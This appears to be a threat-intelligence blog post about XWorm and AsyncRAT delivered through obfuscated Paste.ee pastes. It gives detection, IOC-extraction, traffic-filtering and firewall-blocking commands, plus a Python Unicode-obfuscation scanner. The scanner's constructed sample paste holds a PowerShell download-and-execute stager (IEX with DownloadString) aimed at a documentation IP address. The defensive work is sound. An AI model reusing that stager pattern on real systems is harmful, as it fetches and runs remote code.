Threat Actors Abuse Paste.ee to Distribute XWorm and AsyncRAT Malware

Researchers at Hunt Intelligence, Inc. discovered threat actors abusing Paste.ee, a legitimate pastebin service, to distribute XWorm and AsyncRAT malware. The attackers used Unicode obfuscation to evade detection while leveraging Paste.ee's free API to host malicious payloads.

Key Findings:

  • Paste.ee (https://paste.ee/) is a free text-sharing platform with 4.8M+ pastes.
  • Attackers hid malicious code using rare Unicode characters to bypass security scans.
  • Indicators of Compromise (IOCs) were shared for threat hunting.

You Should Know:

1. Detecting Malicious Paste.ee Links

Pull the raw paste (the /r/ path returns the text without the site's HTML) and search it for non-ASCII bytes:

curl -s "https://paste.ee/r/<paste-id>" | LC_ALL=C grep -naP "[\x80-\xFF]" | less 

Replace <paste-id> with the ID from the suspicious link. LC_ALL=C makes grep -P match raw bytes, so the class hits every byte of every multibyte UTF-8 sequence; in a UTF-8 locale the same class matches only code points U+0080 to U+00FF and misses zero-width and other obfuscation characters above that range. -a keeps grep from treating the input as binary, and -n prints the line number of each hit.

2. Extracting IOCs from Pastebin Sites

wget -qO- "https://paste.ee/r/<paste-id>" | grep -Eo "https?://[^\"'[:space:]<>]+" | sort -u 

The character class stops a URL at whitespace, quotes and angle brackets; the original pattern [^"]+ ran on to the next double quote and swallowed whatever followed the link. A URL that the attacker split with zero-width characters is extracted with those characters still inside it and will not match an exact-match blocklist, so strip them before comparing.

3. Analyzing AsyncRAT & XWorm Traffic

Use Wireshark filters to find C2 sessions. C2 ports are chosen by the operator when the client is built, so a port filter only catches samples that kept common defaults; anchor on the addresses from the published IOCs instead:

ip.addr == <c2-ip> || tcp.port == 8080 || tcp.port == 4444 

AsyncRAT and XWorm carry C2 over their own TCP protocols rather than plain HTTP, so an http.user_agent filter does not surface them.

4. Blocking Malicious C2 Addresses via Firewall

Beacons are initiated by the infected host, so the outbound direction is the one that matters (the original INPUT rule only stopped connections coming from the C2 server). On Linux (iptables):

sudo iptables -A OUTPUT -d <c2-ip> -j DROP 
sudo iptables -A INPUT -s <c2-ip> -j DROP 

On Windows (PowerShell):

New-NetFirewallRule -DisplayName "Block XWorm C2" -Direction Outbound -Action Block -RemoteAddress "<c2-ip>" 

Block the specific addresses and paste URLs from the IOC list rather than Paste.ee as a whole unless your environment has no legitimate use for it, and expect operators to rotate infrastructure, so treat IP blocks as a stopgap.

5. Hunting for Unicode Obfuscation in Logs

nginx writes its access log to /var/log/nginx/ by default; journalctl only helps when the service logs to journald. Either way, force byte-wise matching:

LC_ALL=C grep -naP "[\x80-\xFF]" /var/log/nginx/access.log 
journalctl -u nginx --no-pager | LC_ALL=C grep -aP "[\x80-\xFF]" 

Web servers log request paths percent-encoded, so a zero-width space in a query string is stored as %E2%80%8B and the log line is pure ASCII. Hunt for the encoded forms as well (U+200B to U+200F, the U+202A to U+202E bidi controls, and the U+FEFF byte order mark):

grep -iE "%E2%80%8[B-F]|%E2%80%A[A-E]|%EF%BB%BF" /var/log/nginx/access.log 
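Steps 1, 2 and 5 above are one-liners that only tell you a non-ASCII byte exists. The script below, added here as an example and not code from the Hunt Intelligence report or from Undercode, does the analyst's next three moves in one place: it classifies each non-ASCII code point (invisible format character, combining mark, or a letter from another script used as a homoglyph), strips the invisible ones so split keywords and URLs read as written before IOCs are extracted, and percent-decodes a web-server log line before scanning it. The paste text, the paste ID and the log line are constructed; the IPs are RFC 5737 documentation addresses.

```python
"""Find Unicode obfuscation in a paste and pull IOCs out of it.

Added example for this post, not code from the Hunt Intelligence report or
from Undercode. Every input below is constructed: the IPs are RFC 5737
documentation addresses and the paste ID is made up.
"""
import re
import unicodedata
from urllib.parse import unquote

# Code points that render as nothing: zero-width spaces/joiners, bidi
# overrides, soft hyphen, BOM, tag characters (category Cf), plus controls,
# private-use and unassigned characters.
INVISIBLE_CATEGORIES = {"Cf", "Cc", "Co", "Cn"}
# Combining marks attach to the previous glyph and are easy to miss visually.
MARK_CATEGORIES = {"Mn", "Me"}

URL_RE = re.compile(r"https?://[^\s\"'<>)]+")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

# Constructed stager text: keywords split by zero-width characters and a
# Cyrillic homoglyph (U+0420) replacing the leading "P" of PowerShell.
SAMPLE_PASTE = (
    "$u = 'http://198.51.100.23:8080/upd\u200bate.txt'\n"
    "I\u200bE\u200bX (New-Obj\u200cect Net.WebClient).DownloadString($u)\n"
    "# mirror: https://paste.ee/r/examplepaste\n"
    "\u0420owerShell -w hidden -c $cmd\n"
)

# Constructed nginx access-log line: the zero-width space inside the query
# string arrives percent-encoded, so the raw line is pure ASCII.
SAMPLE_LOG_LINE = (
    '203.0.113.7 - - [01/Jan/2025:00:00:00 +0000] '
    '"GET /?c=I%E2%80%8BEX HTTP/1.1" 200 12'
)


def find_suspicious_chars(text):
    """One record per non-ASCII code point, tagged with why it is suspect."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for col, ch in enumerate(line, 1):
            if ord(ch) < 0x80:
                continue
            cat = unicodedata.category(ch)
            if cat in INVISIBLE_CATEGORIES:
                reason = "invisible"
            elif cat in MARK_CATEGORIES:
                reason = "combining mark"
            else:
                reason = "non-ASCII"   # letters from other scripts: homoglyphs
            hits.append({
                "line": lineno, "col": col,
                "codepoint": f"U+{ord(ch):04X}",
                "name": unicodedata.name(ch, "<unnamed>"),
                "category": cat, "reason": reason,
            })
    return hits


def summarize(hits):
    """Count hits per reason, e.g. {'invisible': 4, 'non-ASCII': 1}."""
    counts = {}
    for h in hits:
        counts[h["reason"]] = counts.get(h["reason"], 0) + 1
    return counts


def strip_invisible(text):
    """Drop invisible code points so split keywords read as written
    (I<ZWSP>E<ZWSP>X -> IEX). Homoglyphs are left alone: they need review,
    not a silent rewrite."""
    return "".join(
        ch for ch in text
        if ord(ch) < 0x80 or unicodedata.category(ch) not in INVISIBLE_CATEGORIES
    )


def extract_iocs(text):
    """URLs and IPv4 addresses from a paste, after stripping invisible characters.
    Without the strip, upd<ZWSP>ate.txt is extracted with the zero-width
    character inside it and never matches an exact-match blocklist."""
    clean = strip_invisible(text)
    return {
        "urls": sorted(set(URL_RE.findall(clean))),
        "ips": sorted(set(IPV4_RE.findall(clean))),
    }


def scan_log_line(line):
    """Web servers log request paths percent-encoded; decode before scanning."""
    return find_suspicious_chars(unquote(line))


if __name__ == "__main__":
    hits = find_suspicious_chars(SAMPLE_PASTE)
    for h in hits:
        print(f"line {h['line']} col {h['col']}: {h['codepoint']} {h['name']} ({h['reason']})")
    print(summarize(hits))
    print(extract_iocs(SAMPLE_PASTE))
    print("deobfuscated:", strip_invisible(SAMPLE_PASTE).splitlines()[1])
    print("raw log hits:", len(find_suspicious_chars(SAMPLE_LOG_LINE)),
          "decoded log hits:", len(scan_log_line(SAMPLE_LOG_LINE)))
```

Run it on a paste saved from the /r/ URL, or on a log file, by reading the file into the text argument. The raw log line yields no hits while the decoded one does, which is exactly the case the byte-wise grep in step 5 misses; and the Cyrillic "Р" survives strip_invisible on purpose, since rewriting homoglyphs would hide the very thing an analyst should look at.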

What Undercode Says:

Pastebin services remain a major threat vector for malware distribution. Security teams should:
– Monitor paste sites for unusual Unicode patterns.
– Block known malicious IPs at the firewall level.
– Use YARA rules to detect obfuscated scripts.
– Train analysts in decoding uncommon text obfuscation techniques.

Expected Output:

  • List of malicious IPs/domains from Paste.ee pastes.
  • Detection of AsyncRAT/XWorm C2 traffic.
  • Blocked connections to malware distribution servers.

Prediction:

Attackers will increasingly abuse lesser-known pastebin sites for malware delivery, requiring automated IOC scraping and AI-powered anomaly detection in security tools.

Reported By: Mthomasson Threat – Hackers Feeds
